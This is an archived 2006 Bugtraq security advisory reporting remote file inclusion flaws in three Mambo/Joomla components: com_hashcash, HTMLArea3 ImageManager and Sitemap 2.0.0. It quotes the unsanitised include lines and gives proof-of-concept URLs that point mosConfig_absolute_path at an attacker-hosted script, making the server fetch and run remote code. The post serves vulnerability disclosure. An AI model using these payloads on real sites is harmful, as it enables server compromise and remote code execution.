[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities
From: matdhule@xxxxxxxxx
Date: 13 Jul 2006 01:35:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

ECHO_ADV_38$2006

-----------------------------------------------------------------------------------------------

[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include 
Vulnerabilities
-----------------------------------------------------------------------------------------------

 
Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------

 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Hashcash Component

Application     : com_hashcash Component
version         : 1.2.1
URL             : 
http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash

# HTMLArea3 addon - ImageManager

Application     : HTMLArea3 addon - ImageManager
Version         : 1.5
URL             : 

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

Application     : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version         : Sitemap 2.0.0
URL             : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip

------------------------------------------------------------------------

 
Vulnerability:
~~~~~~~~~~~~~~
 
# Hashcash Component

In folder com_hashcash we found vulnerability script server.php.

-----------------------server.php---------------------------------------
<?php
include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php");
require_once 
($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
...................

------------------------------------------------------------------------

# HTMLArea3 addon - ImageManager


In folder ImageManager we found vulnerability script config.inc.php.

-----------------------config.inc.php-----------------------------------
<?php
// $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $
/**
* HTMLArea3 addon - ImageManager
* Based on Wei Zhuo's ImageManager
* @package Mambo Open Source
* @Copyright  2004 Bernhard Pfeifer aka novocaine
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.5 $
**/

require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");

------------------------------------------------------------------------

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

In folder com_sitemap we found vulnerability script sitemap.xml.php.

-----------------------sitemap.xml.php----------------------
<?php

/**
* XML/XHTML menu system
* @package Mambo_4.5.1
* @copyright (C) 2000 - 2004 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
* Author : Johan Janssens - johan@xxxxxxx (http://www.jinx.be)
**/

// XML library
require_once( $mosConfig_absolute_path . 
'/includes/domit/xml_domit_lite_include.php' );

------------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
 
Proof Of Concept:
~~~~~~~~~~~~~~~
 
http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
 

Solution:
~~~~~~~
 
sanitize variabel $mosConfig_absolute_path.
 
 
------------------------------------------------------------------------
---
Shoutz:
~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@xxxxxxxxxxxxxxx, jasakom_perjuangan@xxxxxxxxxxxxxxx
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

Follow-Ups:
- Re: [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities
  - From: Joxean Koret

Prev by Date: Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.
Next by Date: RE: WordPress 2.0.3 SQL Error and Full Path Disclosure
Previous by thread: [ MDKSA-2006:117-1 ] - Updated libmms packages fix buffer overflow vulnerability
Next by thread: Re: [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities
Index(es):
- Date
- Thread